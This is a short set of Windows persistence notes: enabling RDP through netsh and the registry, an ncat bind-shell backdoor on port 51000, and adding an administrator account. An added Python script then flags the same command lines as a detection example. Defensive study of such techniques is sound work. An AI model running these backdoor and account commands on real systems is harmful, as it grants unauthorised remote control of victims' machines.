*Windows native RDP
*Chrome RDP (or any other third-party RDP)
Setting up the Windows Firewall
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
•netsh – network administration tool
•advfirewall – identifies that you're working with the Windows "advanced" firewall
•firewall – specifies that this is an actual firewall operation, not something else governed by advfirewall
•set rule group="remote desktop" – selects the existing rules in that group for modification
•new enable=Yes – enables those rules, which allows RDP connections through the firewall
Editing the registry key
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
•reg add – adds a new entry to the registry, or overwrites an existing one
•"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" – the key being modified
•/v fDenyTSConnections – the name of the field ("value") being set
•/t REG_DWORD – the data type (Int/DWORD/string/etc.)
•/d 0 – the data assigned to that value; 0 means connections are not denied
•/f – force the change without prompting for confirmation
II. Ncat Backdoor
ncat -lkp 51000 -e "cmd.exe"
•-lkp – listen (-l) on port (-p) 51000 and keep listening (-k) after a client disconnects
•-e "cmd.exe" – when a connection arrives, execute this command and attach its input and output pipes to the connection
III. New User
net user /add Acct4 ThisPassW0rd
net localgroup Administrators /add Acct4
IV. Scheduled arrival
Schtasks
At
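
Each command above leaves a recognisable process command line, which is where a defender can catch it. The following is an added example, not part of the original notes: it matches constructed process-creation command lines against the patterns shown on this page. The rule names, the sample lines and the schtasks /create and at time patterns are assumptions made for illustration.

```python
import re

def _rx(pattern):
    """Turn a case-insensitive regex into a predicate over one command line."""
    return re.compile(pattern, re.I).search

def _ncat_exec_listener(cmd):
    """True when ncat is asked both to listen and to run a program per connection."""
    tokens = cmd.split()
    if not tokens or not re.fullmatch(r'(?:.*[\\/])?ncat(?:\.exe)?', tokens[0].strip('"'), re.I):
        return False
    # Short flags may be clustered (-lkp) or separate (-l -k -p); they are case-sensitive.
    short = "".join(t[1:] for t in tokens[1:] if re.fullmatch(r"-[A-Za-z]+", t))
    longs = {t.split("=")[0].lower() for t in tokens[1:] if t.startswith("--")}
    listens = "l" in short or "--listen" in longs
    executes = "e" in short or "c" in short or bool(longs & {"--exec", "--sh-exec"})
    return listens and executes

# Rule names are hypothetical labels; the patterns follow the commands on this page.
RULES = [
    ("rdp_firewall_rule_enabled", _rx(r'\bnetsh(\.exe)?"?\s.*\badvfirewall\b.*\bgroup\s*=\s*"?remote desktop"?.*\benable\s*=\s*yes\b')),
    ("rdp_registry_enabled", _rx(r'\breg(\.exe)?"?\s+add\b.*\\Terminal Server"?\s.*\bfDenyTSConnections\b.*/d\s+0\b')),
    ("ncat_exec_listener", _ncat_exec_listener),
    ("local_admin_added", _rx(r'\bnet1?(\.exe)?"?\s+localgroup\s+"?administrators"?\s.*/add\b')),
    ("local_user_added", _rx(r'\bnet1?(\.exe)?"?\s+user\s.*/add\b')),
    ("scheduled_task_created", _rx(r'\bschtasks(\.exe)?"?\s.*/create\b|^\s*at(\.exe)?\s+\d')),
]

def classify(cmdline):
    """Return the names of every rule that matches one process command line."""
    return [name for name, matches in RULES if matches(cmdline)]

# Constructed process-creation command lines (illustrative, not real telemetry).
SAMPLE = [
    r'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes',
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r'ncat -lkp 51000 -e "cmd.exe"',
    r'net localgroup Administrators /add Acct4',
    r'schtasks /query',  # benign: lists tasks, creates nothing
    r'ncat -l 8080',     # not flagged: a listener with no program attached
]

def scan(lines):
    """Return (command line, matched rule names) for each line that hits a rule."""
    return [(line, hits) for line in lines if (hits := classify(line))]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE):
        print(", ".join(hits), "<-", line)
```

Task creation and local account changes also occur in normal administration, so these rules are best scoped by parent process, user and host role before alerting.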